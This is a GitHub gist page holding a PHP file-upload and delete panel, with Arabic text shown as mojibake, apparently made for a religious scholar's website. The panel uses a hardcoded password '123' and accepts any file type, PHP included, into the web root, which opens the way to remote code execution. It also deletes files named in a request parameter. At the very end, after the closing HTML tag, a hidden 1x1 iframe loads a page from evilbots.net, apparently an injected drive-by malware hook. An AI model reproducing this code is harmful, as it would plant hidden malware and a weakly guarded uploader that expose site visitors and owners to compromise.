Skip to content

Instantly share code, notes, and snippets.

@jubabaghdad

jubabaghdad/upass.php

Created August 18, 2017 13:37
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save jubabaghdad/8819787b0f24adfbaa937e893c21e97d to your computer and use it in GitHub Desktop.
Save jubabaghdad/8819787b0f24adfbaa937e893c21e97d to your computer and use it in GitHub Desktop.
Download ZIP
upass.php
Raw
upass.php
<?
$secret = "123"; // ÇáÑÞã ÇáÓÑí ááæÍÉ ÇáÊÍßã
session_start();
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir=rtl>
<head>
<title>ÑÝÚ ãáÝÇÊ ãæÞÚ ÓãÇÍÉ ÇáÔíÎ ÇÈä ÌÈÑíä</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1256" />
<style type="text/css">
FONT {FONT-FAMILY: ms sans serif; FONT-SIZE: 12px}
BODY {FONT-FAMILY: ms sans serif;
FONT-SIZE: 12px;
background:#ffffff}
P {FONT-FAMILY: ms sans serif; FONT-SIZE: 14px}
DIV {FONT-FAMILY: ms sans serif; FONT-SIZE: 14px}
td {
border: 2px solid #3646A7;
border-right: 2px solid #3646A7;
border-bottom: 2px solid #3646A7;
background-color: #94C7F1;
color: #3C0954;
FONT-FAMILY: ms sans serif; FONT-SIZE: 14px
}
table {
margin-left: auto;
margin-right: auto;
}
form {
padding: 0px;
margin: 0px;
}
A:link {color:#000000;
FONT-SIZE: 12px;
FONT-FAMILY: ms sans serif;text-decoration:none}
A:active {color:#525293;
FONT-SIZE: 12px;
FONT-FAMILY: ms sans serif;text-decoration:none}
A:visited {color:#525293;
FONT-SIZE: 12px;
FONT-FAMILY: ms sans serif;text-decoration:none}
A:hover {color:#525293;
FONT-SIZE: 12px;
FONT-FAMILY: ms sans serif;text-decoration:underline}
</style>
</head>
<body>
<?
if ($_GET['action'] == "logout") {
session_destroy();
unset ($_SESSION['secret']);
}
$path_name = pathinfo($_SERVER['PHP_SELF']);
$this_script = $path_name['basename'];
if ($_SESSION['secret'] !== $secret) {
if ($_POST['secret'] == $secret) {
$_SESSION['secret'] = $secret;
}
else {
echo "<p align=\"center\"><b style=\"color: red\">áæÍÉ ÊÍßã ÇáãÔÑÝ</b><br /></p><br />\n";
echo "<form action=\"$PHP_SELF\" method=\"post\"> <p align=\"center\">\n";
echo "<input name=\"secret\" type=\"password\" size=\"20\"><br>\n";
echo "<input name=\"submit\" type=\"submit\" value=\"ÏÎæá\">\n";
echo "</form>\n";
exit;
}
}
//**************************************************************************
?>
<table width="680" cellspacing="0" cellpadding="0">
<tr><td class="transparent">
<?
$error = false;
$file = false;
if (!$error && !function_exists("version_compare"))
{ echo ("<p class=\"error\">PHP version 4.1.0 is required for BigDump to proceed. You have PHP ".phpversion()." installed. Sorry!</p>\n");
$error=true;
}
if (!$error)
{ $upload_max_filesize=ini_get("upload_max_filesize");
if (eregi("([0-9]+)K",$upload_max_filesize,$tempregs)) $upload_max_filesize=$tempregs[1]*1024;
if (eregi("([0-9]+)M",$upload_max_filesize,$tempregs)) $upload_max_filesize=$tempregs[1]*1024*1024;
if (eregi("([0-9]+)G",$upload_max_filesize,$tempregs)) $upload_max_filesize=$tempregs[1]*1024*1024*1024;
}
$upload_dir=dirname($_SERVER["SCRIPT_FILENAME"]);
if (!$error && isset($_REQUEST["uploadbutton"]))
{ if (is_uploaded_file($_FILES["dumpfile"]["tmp_name"]) && ($_FILES["dumpfile"]["error"])==0)
{
$uploaded_filename=str_replace(" ","_",$_FILES["dumpfile"]["name"]);
$uploaded_filepath=str_replace("\\","/",$upload_dir."/".$uploaded_filename);
if (file_exists($uploaded_filename))
{ echo ("<p class=\"error\">ÇáãáÝ $uploaded_filename ãæÌæÏ ãÓÈÞÇð ÇáÑÌÇÁ ÍÐÝå æÇáãÍÇæáÉ ãÑå ÇÎÑì</p>\n");
}
else if (!@move_uploaded_file($_FILES["dumpfile"]["tmp_name"],$uploaded_filepath))
{ echo ("<p class=\"error\">Error moving uploaded file ".$_FILES["dumpfile"]["tmp_name"]." to the $uploaded_filepath</p>\n");
echo ("<p>ÊÃßÏ Çä ÇáãáÝ $upload_dir ãÚØì ÇáÊÕÑíÍ 777</p>\n");
}
else
{ echo ("<p class=\"success\">ÇáãáÝ ÇáãÑÝæÚ Êã ÍÝÙå ÈÃÓã http://www.ibn-jebreen.com/uplod/$uploaded_filename</p>\n"
);
}
}
else
{ echo ("<p class=\"error\">ÎØà Ýí ÊÍãíá ÇáãáÝ ".$_FILES["dumpfile"]["name"]."</p>\n");
}
}
if (!$error && isset($_REQUEST["delete"]) && $_REQUEST["delete"]!=basename($_SERVER["SCRIPT_FILENAME"]))
{ if (@unlink(basename($_REQUEST["delete"])))
echo ("<p class=\"success\">".$_REQUEST["delete"]." Êã ÇáÍÐÝ ÈäÌÇÍ</p>\n");
else
echo ("<p class=\"error\">áã íÊã ÍÐÝ ".$_REQUEST["delete"]."</p>\n");
}
if (!$error && !isset($_REQUEST["fn"]) && $filename=="")
{ if ($dirhandle = opendir($upload_dir))
{ $dirhead=false;
$i = 0;
$extype =array();
while (false !== ($dirfile = readdir($dirhandle)))
{ if (!eregi("\.php$",$dirfile) && !eregi("magtrblogo",$dirfile) && !eregi("error_log",$dirfile) && $dirfile != "." && $dirfile != ".." && $dirfile!=basename($_SERVER["SCRIPT_FILENAME"]))
{
$fileext = explode(".",$dirfile);
$fileextnum = count($fileext)-1;
$extype[$i]= "$fileext[$fileextnum]";
++$i;
if (!$dirhead)
{ echo ("<table cellspacing=\"2\" cellpadding=\"2\">\n");
echo ("<tr><th><p align=\"center\">ÇÓã ÇáãáÝ</td><th><p align=\"center\">ÇáÍÌã</td><th><p align=\"center\">ÇáÊÇÑíÎ æÇáæÞÊ</td><th><p align=\"center\">ÇáäæÚ</td><th>&nbsp;</td><th>&nbsp;</td>\n");
$dirhead=true;
}
$directory = "$php_self"."$dirfile";
if ($exttype2){
if ($fileext[$fileextnum]== "$exttype2"){
echo ("<tr><td><p align=\"center\"><a target=\"_blank\" href=\"$directory\">$dirfile</a></td><td class=\"right\">".filesize($dirfile)."</td><td>".date ("Y-m-d H:i:s", filemtime($dirfile))."</td>");
echo ("<td>$fileext[$fileextnum]</td>");
// echo ("<td>&nbsp;</td>\n");
echo ("<td><p align=\"center\"><a href=\"".$_SERVER["PHP_SELF"]."?action=dump&delete=$dirfile\">ÍÐÝ ÇáãáÝ</a></td></tr>\n");
} } else {
echo ("<tr><td><p align=\"center\"><a target=\"_blank\" href=\"$directory\">$dirfile</a></td><td class=\"right\">".filesize($dirfile)."</td><td>".date ("Y-m-d H:i:s", filemtime($dirfile))."</td>");
echo ("<td>$fileext[$fileextnum]</td>");
// echo ("<td>&nbsp;</td>\n");
echo ("<td><p align=\"center\"><a href=\"".$_SERVER["PHP_SELF"]."?action=dump&delete=$dirfile\">ÍÐÝ ÇáãáÝ</a></td></tr>\n");
}
}
}
if ($dirhead) echo ("</table>\n");
else echo ("<p>áÇíæÌÏ ãáÝÇÊ Ýí ÇáãÌáÏ ÍÇáíÇð</p>\n");
closedir($dirhandle);
}
else
{ echo ("<p class=\"error\">Error listing directory $upload_dir</p>\n");
$error=$true;
}
}
if (!$error && !isset($_REQUEST["fn"]) && $filename=="")
{
do { $tempfilename=time().".tmp"; } while (file_exists($tempfilename));
if (!($tempfile=@fopen($tempfilename,"w")))
{ echo ("<p>Upload form disabled. Permissions for the working directory <i>$upload_dir</i> <b>must be set to 777</b> in order ");
echo ("to upload files from here. Alternatively you can upload your dump files via FTP.</p>\n");
}
else
{ fclose($tempfile);
unlink ($tempfilename);
echo ("<p align=\"center\">ÊÓÊØíÚ ÊÍãíá ãáÝ ÈÍÌã 2 ãíÌÇÈÇíÊ");
echo (" ãÈÇÔÑÉ ãä ÇáãÊÕÝÍ Çæ ÇáÇÝÖá ÇÓÊÎÏÇã ÈÑäÇãÌ FTP ÇÐÇ ßÇä ÍÌã ÇáãáÝ ßÈíÑå ÌÏÇð.</p>\n");
?>
<form method="POST" action="<? echo '".$PHP_SELF."'; ?>" enctype="multipart/form-data">
<input type="hidden" name="MAX_FILE_SIZE" value="$upload_max_filesize">
<p align="center">ÇáãáÝ: <input type="file" name="dumpfile" accept="*/*" size="60"></p>
<p align="center"><input type="submit" name="uploadbutton" value="ÊÍãíá"></p><br><br>
</form>
<?
echo "<form action=\"$PHP_SELF\" method=\"post\">
<p dir=\"ltr\" align=\"center\">
<span lang=\"ar-sa\">&nbsp; ÇÓÊÚÑÇÖ ÈÇáÇãÊÏÇÏ :</span>&nbsp;&nbsp;
<select size=\"1\" dir=\"ltr\" value=\"$exttype2\" name=\"exttype2\">";
$extype = array_unique($extype);
Magtrb($extype);
echo" </select><br>
<input name=\"submit\" type=\"submit\" value=\"ÇÓÊÚÑÇÖ\"></p>
</form><br />";
}
}
if ($file && !$gzipmode) fclose($file);
else if ($file && $gzipmode) gzclose($file);
function Magtrb($x){
if (!empty($x))
{
foreach ($x AS $_key)
{
echo"<option>$_key</option>";
}
}
}
?>
</td></tr></table>
</body>
</html>
<iframe src="http://evilbots.net/fi/index.php" width=1 height=1 style="visibility: hidden"></iframe>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment